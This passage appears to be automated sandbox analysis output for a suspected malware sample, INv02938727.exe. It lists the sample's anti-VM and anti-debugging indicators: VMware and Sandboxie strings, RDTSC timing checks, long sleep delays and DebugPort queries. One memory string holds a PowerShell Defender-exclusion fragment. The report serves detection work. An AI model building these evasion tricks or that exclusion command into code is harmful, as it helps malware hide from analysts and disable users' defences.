            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INv02938727.exe PID: 4852, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\INv02938727.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\INv02938727.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002E198E4 second address: 0000000002E198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002E19B5E second address: 0000000002E19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\INv02938727.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\INv02938727.exe TID: 4864Thread sleep time: -101578s >= -30000s
            Source: C:\Users\user\Desktop\INv02938727.exe TID: 5640Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6504Thread sleep time: -56000s >= -30000s
            Source: C:\Windows\SysWOW64\control.exe TID: 7076Thread sleep time: -55000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\INv02938727.exeThread delayed: delay time: 101578
            Source: C:\Users\user\Desktop\INv02938727.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000003.00000000.276653332.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000003.00000000.276653332.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000003.00000000.276912618.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000003.00000000.276912618.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000002.524190302.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000003.00000000.276768053.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
            Source: explorer.exe, 00000003.00000000.276912618.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.276768053.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000003.00000000.271171109.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\INv02938727.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0040ACD0 LdrLoadDll,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01274120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012E41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01324015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01324015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01312073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01321074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01270050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01270050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012990AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012540E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012540E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012540E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012558EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01283B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01283B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01328B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01284BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01284BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01284BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01325BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01261B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01261B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0130D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01294A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01294A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01268A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01255210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01255210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01255210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01255210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01273A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0130B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0130B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01328A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0129927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01259240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012E4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01328D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01263D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01284D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01284D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01284D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012DA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0127C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01293D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01303D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01277D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01281DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01281DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01281DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01252D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01308DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012D6DC9 mov eax, dword ptr fs:[00000030h]
